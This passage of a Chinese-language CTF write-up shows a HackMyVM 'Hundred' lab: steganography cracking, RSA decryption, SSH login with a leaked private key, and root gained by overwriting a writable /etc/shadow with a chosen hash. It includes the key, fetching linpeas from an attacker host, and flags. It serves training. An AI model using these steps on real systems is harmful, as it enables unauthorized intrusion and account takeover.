4hZLppmqbpy8weqw5JzlKroBfCi5\nvnscRCY2jTHTZw8MKInuyDm2tvgl6d0vm6WMMqqM1D1mA9G0v3OeWdBshsY9J+HK\nCIyYwwKBgQDEXoZ+lZKyPUBSgcE+b52U2Dj9GAPKPUDZpsCbUebftZknOk\/HelF1\nwiWWDjni1ILVSfWIR4\/nvosJPa+39WDv+dFt3bJdcUA3SL2acW3MGVPC6abZWwSo\nizXrZm8h0ZSuXyU\/uuT3BCJt77HyN2cPZrqccPwanS9du6zrX0u2yQ==\n-----END RSA PRIVATE KEY-----\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa.pub \n-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwsrHORyA+mG6HS9ZmZwz\nPmKHrHhA0\/kKCwNjUG8rmPVupv73mUsewpoGvYB9L9I7pUAsMscAb5MVo89d4b0z\n2RnXDD1fh6mKlTJmcNwWCnA1PgD+OwqewshpkCBhCV6O2P6dktfA8UI\/uqF6uT4Q\nISU4ksriN16cOm\/89jHadetB8dCeh3Rx6HrFNccY8aiDRSA9meqz7YGE2+lJ\/Ntw\ntndUkzzxKxuKC6z4gG780tZHhg83xVwZ9bxPyHfGqHWmV4yGsAgp7mot7pg9Vzff\nnP6DAVnbReDDbhNLcnfVXEkBv8SQL7OFIiKxJpoa1ADqGffA5LOPFdYKbbCFMict\nQQIDAQAB\n-----END PUBLIC KEY-----\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat users.txt \n--- SNIP ---\nnoname\nroelvb\nch4rm\nmarcioapm\nisen\nsys7em\nchicko\ntasiyanci\nluken\nalienum\nlinked\ntatayoyo\n0xr0n1n\nexploiter\nkanek180\ncromiphi\nsoftyhack\nb4el7d\nval1d\n--- SNIP ---\n\nThanks!\nhmv<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/logo.jpg \n--2024-04-24 01:29:09-- http:\/\/192.168.0.159\/logo.jpg\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 7277 (7.1K) [image\/jpeg]\nSaving to: \u2018logo.jpg\u2019\n\nlogo.jpg 100%[=========================================================================>] 7.11K --.-KB\/s in 0s \n\n2024-04-24 01:29:09 (892 MB\/s) - \u2018logo.jpg\u2019 saved [7277\/7277]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt logo.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.94% (133.4 MB) \n[!] error: Could not find a valid passphrase.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ stegseek -wl users.txt logo.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: "cromiphi"\n[i] Original filename: "toyou.txt".\n[i] Extracting to "logo.jpg.out".\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat logo.jpg.out \nd4t4s3c#1<\/code><\/pre>\n\u7136\u540e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/l4nr3n \n<html>\n<head><title>404 Not Found<\/title><\/head>\n<body bgcolor="white">\n<center><h1>404 Not Found<\/h1><\/center>\n<hr><center>nginx\/1.14.2<\/center>\n<\/body>\n<\/html><\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/h4ckb1tu5.enc \n--2024-04-24 01:31:06-- http:\/\/192.168.0.159\/h4ckb1tu5.enc\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 256 [application\/octet-stream]\nSaving to: \u2018h4ckb1tu5.enc\u2019\n\nh4ckb1tu5.enc 100%[=========================================================================>] 256 --.-KB\/s in 0s \n\n2024-04-24 01:31:06 (65.8 MB\/s) - \u2018h4ckb1tu5.enc\u2019 saved [256\/256]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat h4ckb1tu5.enc \n\ufffdJzU(}\ufffdD\ufffdH\ufffd\ufffd\ufffd\ufffd\ufffd\u04ca\ufffd\ufffdTfV\ufffd\ufffd\ufffd\u00f5\ufffdH\ufffd\ufffd\ufffdaL\ufffd$\ufffd\ufffdEq\ufffd2\ufffd)]`J\ufffd\ufffd\ufffd2H\ufffd\u067d~\ufffd\ufffd\ufffd\ufffd;2\ufffd"\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n 0l\n \ufffdu\ufffdk\n \ufffd\ufffd\ufffdUl\ufffd\ufffd.C\ufffd1\ufffdQ\ufffdR\ufffdW\u03b4\ufffdj>\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\ufffd\u02f4\u059a}\ufffd\ufffdK\ufffd\ufffd\ufffd\ufffdJ\ufffd\ufffd\ufffd\ufffd\ufffdi[?\ufffd\ufffd\ufffd\ufffd$\ufffd\u070e"\n \ufffd\ufffd\ufffdx\ufffd\ufffd\ufffd\ufffdJ\ufffd\ufffd\ufffd\ufffd\ufffd=q\ufffdZq\ufffd\ufffd4!\ufffdK\ufffd\ufffde\ufffdP\n J{\ufffd\ufffdQ\ufffd\ufffd\ufffd\ufffd3\ufffdm\ufffdQ\ufffd\ufffdJ\ufffd\ufffd_)\ufffd\u0676\ufffdZ <\/code><\/pre>\n\u5f97\u5230\u5bc6\u94a5\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ openssl rsautl -decrypt -in h4ckb1tu5.enc -out decrypto.txt -inkey id_rsa.pem\nThe command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ openssl pkeyutl -decrypt -in h4ckb1tu5.enc -out decrypto.txt -inkey id_rsa.pem \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat decrypto.txt \n\/softyhackb4el7dshelldredd<\/code><\/pre>\n\u5f97\u5230\u4e86\u4e00\u4e2a\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\n<html>\n<head><title>301 Moved Permanently<\/title><\/head>\n<body bgcolor="white">\n<center><h1>301 Moved Permanently<\/h1><\/center>\n<hr><center>nginx\/1.14.2<\/center>\n<\/body>\n<\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/\nHi boss.\nIs there --> ...<\/code><\/pre>\n\u626b\u63cf\u65b0\u76ee\u5f55<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/ -e* -i 200,300-399 2>\/dev\/null\n[sudo] password for kali: \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/hundred\/reports\/http_192.168.0.159\/_softyhackb4el7dshelldredd__24-04-24_01-38-58.txt\n\nTarget: http:\/\/192.168.0.159\/\n\n[01:38:58] Starting: softyhackb4el7dshelldredd\/\n[01:39:22] 200 - 2KB - \/softyhackb4el7dshelldredd\/id_rsa\n\nTask Completed<\/code><\/pre>\n\u5bc6\u94a5\u767b\u5f55<\/h3>\n
\u4e0b\u8f7d\u4e0b\u6765\uff0c\u5c1d\u8bd5\u4f7f\u7528\u5bc6\u94a5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/id_rsa\n--2024-04-24 01:42:34-- http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/id_rsa\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1876 (1.8K) [application\/octet-stream]\nSaving to: \u2018id_rsa.1\u2019\n\nid_rsa.1 100%[=========================================================================>] 1.83K --.-KB\/s in 0s \n\n2024-04-24 01:42:34 (331 MB\/s) - \u2018id_rsa.1\u2019 saved [1876\/1876]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa \nThe authenticity of host '192.168.0.159 (192.168.0.159)' can't be established.\nED25519 key fingerprint is SHA256:CiCK\/UJWUULl80syMwfpY3+G25hq7fX\/xTkHA61y2Ws.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.159' (ED25519) to the list of known hosts.\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@ WARNING: UNPROTECTED PRIVATE KEY FILE! @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nPermissions 0644 for 'id_rsa' are too open.\nIt is required that your private key files are NOT accessible by others.\nThis private key will be ignored.\nLoad key "id_rsa": bad permissions\nhmv@192.168.0.159's password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa\nLoad key "id_rsa": error in libcrypto\nhmv@192.168.0.159's password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ vim id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa \n \/ \\\n \/ _ \\\n | \/ \\ |\n || || _______\n || || |\\ \\\n || || ||\\ \\\n || || || \\ |\n || || || \\__\/\n || || || ||\n \\\\_\/ \\_\/ \\_\/\/\n \/ _ _ \\\n \/ \\\n | O O |\n | \\ ___ \/ | \n \/ \\ \\_\/ \/ \\\n\/ ----- | --\\ \\\n| \\__\/|\\__\/ \\ |\n\\ |_|_| \/\n \\_____ _____\/\n \\ \/\n | |\n-------------------------\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ls -la\ntotal 52\ndrwxr-xr-x 3 kali kali 4096 Apr 24 01:44 .\ndrwxr-xr-x 66 kali kali 4096 Apr 24 01:16 ..\n-rw-r--r-- 1 kali kali 27 Apr 24 01:35 decrypto.txt\n-rw-r--r-- 1 kali kali 256 Aug 2 2021 h4ckb1tu5.enc\n-rw------- 1 kali kali 435 Apr 24 01:44 id_rsa\n-rw-r--r-- 1 kali kali 1876 Aug 2 2021 id_rsa.1\n-rw-r--r-- 1 kali kali 1679 Aug 2 2021 id_rsa.pem\n-rw-r--r-- 1 kali kali 451 Aug 2 2021 id_rsa.pub\n-rw-r--r-- 1 kali kali 7277 Aug 2 2021 logo.jpg\n-rw-r--r-- 1 kali kali 10 Apr 24 01:41 logo.jpg.out\ndrwxr-xr-x 3 root root 4096 Apr 24 01:38 reports\n-rw-r--r-- 1 kali kali 187 Aug 2 2021 users.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ chmod 600 id_rsa.1 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa.1\nEnter passphrase for key 'id_rsa.1': \nLinux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Aug 2 06:43:27 2021 from 192.168.1.51\nhmv@hundred:~$ whoami;id\nhmv\nuid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)<\/code><\/pre>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nhmv@hundred:~$ whoami;id\nhmv\nuid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\nhmv@hundred:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 hmv hmv 4096 Aug 2 2021 .\ndrwxr-xr-x 3 root root 4096 Aug 2 2021 ..\n-rw------- 1 hmv hmv 23 Aug 2 2021 .bash_history\n-rw-r--r-- 1 hmv hmv 220 Aug 2 2021 .bash_logout\n-rw-r--r-- 1 hmv hmv 3526 Aug 2 2021 .bashrc\ndrwxr-xr-x 3 hmv hmv 4096 Aug 2 2021 .local\n-rw-r--r-- 1 hmv hmv 807 Aug 2 2021 .profile\ndrwx------ 2 hmv hmv 4096 Aug 2 2021 .ssh\n-rw------- 1 hmv hmv 12 Aug 2 2021 user.txt\n-rw------- 1 hmv hmv 53 Aug 2 2021 .Xauthority\nhmv@hundred:~$ cat user.txt \nHMV100vmyay\nhmv@hundred:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nhmv@hundred:~$ sudo -l\n-bash: sudo: command not found\nhmv@hundred:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nhmv:x:1000:1000:hmv,,,:\/home\/hmv:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:105:113:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nhmv@hundred:~$ cat \/etc\/shadow\ncat: \/etc\/shadow: Permission denied\nhmv@hundred:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep<\/code><\/pre>\n\u4e0a\u4f20linpeas.sh<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.159 - - [24\/Apr\/2024 01:49:41] "GET \/linpeas.sh HTTP\/1.1" 200 -<\/code><\/pre>\nhmv@hundred:~$ wget http:\/\/192.168.0.143:8888\/linpeas.sh\n--2024-04-24 01:49:46-- http:\/\/192.168.0.143:8888\/linpeas.sh\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 860549 (840K) [text\/x-sh]\nSaving to: \u2018linpeas.sh\u2019\n\nlinpeas.sh 100%[=========================================================================>] 840.38K --.-KB\/s in 0.03s \n\n2024-04-24 01:49:46 (24.2 MB\/s) - \u2018linpeas.sh\u2019 saved [860549\/860549]\n\nhmv@hundred:~$ chmod +x linpeas.sh<\/code><\/pre>\n\u8fd0\u884c\u770b\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u8fd9\u4e2a\u6587\u4ef6\u6240\u6709\u4eba\u53ef\u5199\uff0c\u6240\u4ee5\u6dfb\u52a0\u4e00\u4e2a\u5bc6\u94a5\u8fdb\u884c\u5c31\u884c\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ openssl passwd\nPassword: \nVerifying - Password: \n# \u5bc6\u7801\u6539\u4e3aroot\u4e86\necho 'root:qdbEWfKM1ov2g:18888:0:99999:7:::' > \/etc\/shadow<\/code><\/pre>\n\n\/etc\/shadow \u6587\u4ef6\u7684\u5185\u5bb9\u5305\u62ec9\u4e2a\u5b57\u6bb5<\/p>\n
\u7528\u6237\u540d:\u5bc6\u7801:\u4e0a\u6b21\u4fee\u6539\u5bc6\u7801\u7684\u65f6\u95f4:\u4e24\u6b21\u4fee\u6539\u53e3\u4ee4\u95f4\u9694\u6700\u5c11\u7684\u5929\u6570:\u4e24\u6b21\u4fee\u6539\u53e3\u4ee4\u95f4\u9694\u6700\u591a\u7684\u5929\u6570:\u63d0\u524d\u591a\u5c11\u5929\u8b66\u544a\u7528\u6237\u53e3\u4ee4\u5c06\u8fc7\u671f:\u5728\u53e3\u4ee4\u8fc7\u671f\u4e4b\u540e\u591a\u5c11\u5929\u7981\u7528\u6b64\u7528\u6237:\u7528\u6237\u8fc7\u671f\u65e5\u671f:\u4fdd\u7559\u5b57\u6bb5<\/strong><\/p>\n\u7528\u6237\u540d<\/strong>:\u5728\/etc\/shadow\u4e2d\uff0c\u7528\u6237\u540d\u548c\/etc\/passwd \u662f\u76f8\u540c\u7684\uff0c\u8fd9\u6837\u5c31\u628apasswd \u548cshadow\u4e2d\u7528\u7684\u7528\u6237\u8bb0\u5f55\u8054\u7cfb\u5728\u4e00\u8d77\uff1b\u8fd9\u4e2a\u5b57\u6bb5\u662f\u975e\u7a7a\u7684\uff1b<\/p>\n\u5bc6\u7801<\/strong>(\u5df2\u88ab\u52a0\u5bc6):\u5982\u679c\u662f\u6709\u4e9b\u7528\u6237\u5728\u8fd9\u6bb5\u662fx\uff0c\u8868\u793a\u8fd9\u4e2a\u7528\u6237\u4e0d\u80fd\u767b\u5f55\u5230\u7cfb\u7edf\uff1b\u8fd9\u4e2a\u5b57\u6bb5\u662f\u975e\u7a7a\u7684\uff1b<\/p>\n\u4e0a\u6b21\u4fee\u6539\u53e3\u4ee4\u7684\u65f6\u95f4<\/strong>:\u8fd9\u4e2a\u65f6\u95f4\u662f\u4ece1970\u5e7401\u670801\u65e5\u7b97\u8d77\u5230\u6700\u8fd1\u4e00\u6b21\u4fee\u6539\u53e3\u4ee4\u7684\u65f6\u95f4\u95f4\u9694\uff08\u5929\u6570\uff09\uff0c\u60a8\u53ef\u4ee5\u901a\u8fc7passwd \u6765\u4fee\u6539\u7528\u6237\u7684\u5bc6\u7801\uff0c\u7136\u540e\u67e5\u770b\/etc\/shadow\u4e2d\u6b64\u5b57\u6bb5\u7684\u53d8\u5316\uff1b<\/p>\n\u4e24\u6b21\u4fee\u6539\u53e3\u4ee4\u95f4\u9694\u6700\u5c11\u7684\u5929\u6570<\/strong>:\u5982\u679c\u8bbe\u7f6e\u4e3a0,\u5219\u7981\u7528\u6b64\u529f\u80fd\uff0c\u4e5f\u5c31\u662f\u8bf4\u7528\u6237\u5fc5\u987b\u7ecf\u8fc7\u591a\u5c11\u5929\u624d\u80fd\u4fee\u6539\u5176\u53e3\u4ee4\uff1b\u6b64\u9879\u529f\u80fd\u7528\u5904\u4e0d\u662f\u592a\u5927\uff1b\u9ed8\u8ba4\u503c\u662f\u901a\u8fc7\/etc\/login.defs\u6587\u4ef6\u5b9a\u4e49\u4e2d\u83b7\u53d6\uff0cPASS_MIN_DAYS \u4e2d\u6709\u5b9a\u4e49\uff1b<\/p>\n\u4e24\u6b21\u4fee\u6539\u53e3\u4ee4\u95f4\u9694\u6700\u591a\u7684\u5929\u6570\uff1a<\/strong>\u8fd9\u4e2a\u80fd\u589e\u5f3a\u7ba1\u7406\u5458\u7ba1\u7406\u7528\u6237\u53e3\u4ee4\u7684\u65f6\u6548\u6027\uff0c\u5e94\u8be5\u8bf4\u5728\u589e\u5f3a\u4e86\u7cfb\u7edf\u7684\u5b89\u5168\u6027\uff1b\u5982\u679c\u662f\u7cfb\u7edf\u9ed8\u8ba4\u503c\uff0c\u662f\u5728\u6dfb\u52a0\u7528\u6237\u65f6\u7531\/etc\/login.defs\u6587\u4ef6\u5b9a\u4e49\u4e2d\u83b7\u53d6\uff0c\u5728PASS_MAX_DAYS \u4e2d\u5b9a\u4e49\uff1b<\/p>\n\u63d0\u524d\u591a\u5c11\u5929\u8b66\u544a\u7528\u6237\u53e3\u4ee4\u5c06\u8fc7\u671f:<\/strong>\u5f53\u7528\u6237\u767b\u5f55\u7cfb\u7edf\u540e\uff0c\u7cfb\u7edf\u767b\u5f55\u7a0b\u5e8f\u63d0\u9192\u7528\u6237\u53e3\u4ee4\u5c06\u8981\u4f5c\u5e9f\uff1b\u5982\u679c\u662f\u7cfb\u7edf\u9ed8\u8ba4\u503c\uff0c\u662f\u5728\u6dfb\u52a0\u7528\u6237\u65f6\u7531\/etc\/login.defs\u6587\u4ef6\u5b9a\u4e49\u4e2d\u83b7\u53d6\uff0c\u5728PASS_WARN_AGE \u4e2d\u5b9a\u4e49\uff1b<\/p>\n\u5728\u53e3\u4ee4\u8fc7\u671f\u4e4b\u540e\u591a\u5c11\u5929\u7981\u7528\u6b64\u7528\u6237<\/strong>:\u6b64\u5b57\u6bb5\u8868\u793a\u7528\u6237\u53e3\u4ee4\u4f5c\u5e9f\u591a\u5c11\u5929\u540e\uff0c\u7cfb\u7edf\u4f1a\u7981\u7528\u6b64\u7528\u6237\uff0c\u4e5f\u5c31\u662f\u8bf4\u7cfb\u7edf\u4f1a\u4e0d\u80fd\u518d\u8ba9\u6b64\u7528\u6237\u767b\u5f55\uff0c\u4e5f\u4e0d\u4f1a\u63d0\u793a\u7528\u6237\u8fc7\u671f\uff0c\u662f\u5b8c\u5168\u7981\u7528\uff1b<\/p>\n\u7528\u6237\u8fc7\u671f\u65e5\u671f<\/strong>:\u6b64\u5b57\u6bb5\u6307\u5b9a\u4e86\u7528\u6237\u4f5c\u5e9f\u7684\u5929\u6570\uff08\u4ece1970\u5e74\u76841\u67081\u65e5\u5f00\u59cb\u7684\u5929\u6570\uff09\uff0c\u5982\u679c\u8fd9\u4e2a\u5b57\u6bb5\u7684\u503c\u4e3a\u7a7a\uff0c\u5e10\u53f7\u6c38\u4e45\u53ef\u7528\uff1b<\/p>\n\u4fdd\u7559\u5b57\u6bb5:<\/strong>\u76ee\u524d\u4e3a\u7a7a\uff0c\u4ee5\u5907\u5c06\u6765Linux\u53d1\u5c55\u4e4b\u7528\uff1b<\/p>\n<\/blockquote>\n\u7136\u540e\u62ff\u5230flag\uff01\uff01\uff01\uff01<\/p>\n
hmv@hundred:~$ su -l root\nPassword: \nroot@hundred:~# ls -la\ntotal 28\ndrwx------ 3 root root 4096 Aug 2 2021 .\ndrwxr-xr-x 18 root root 4096 Aug 2 2021 ..\n-rw------- 1 root root 16 Aug 2 2021 .bash_history\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Aug 2 2021 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw------- 1 root root 15 Aug 2 2021 root.txt\nroot@hundred:~# cat root.txt \nHMVkeephacking<\/code><\/pre>\n\u989d\u5916\u6536\u83b7<\/h2>\n\u4e0b\u8f7dftp\u6587\u4ef6<\/h3>\n
\u4f7f\u7528mget *<\/code>\u53ef\u4ee5\u6279\u91cf\u4e0b\u8f7d\u6587\u4ef6\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"Hundred \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred] \u2514\u2500$ s […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-620","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=620"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620\/revisions"}],"predecessor-version":[{"id":621,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/620\/revisions\/621"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=620"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=620"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240424131909417\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241404807.png\")
<\/div><\/p>\n![\"image-20240424133332629\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241404808.png\")
<\/div>![\"image-20240424133352953\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241404809.png\")
<\/div><\/p>\n![\"image-20240424135247936\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241404811.png\")
<\/div><\/p>\n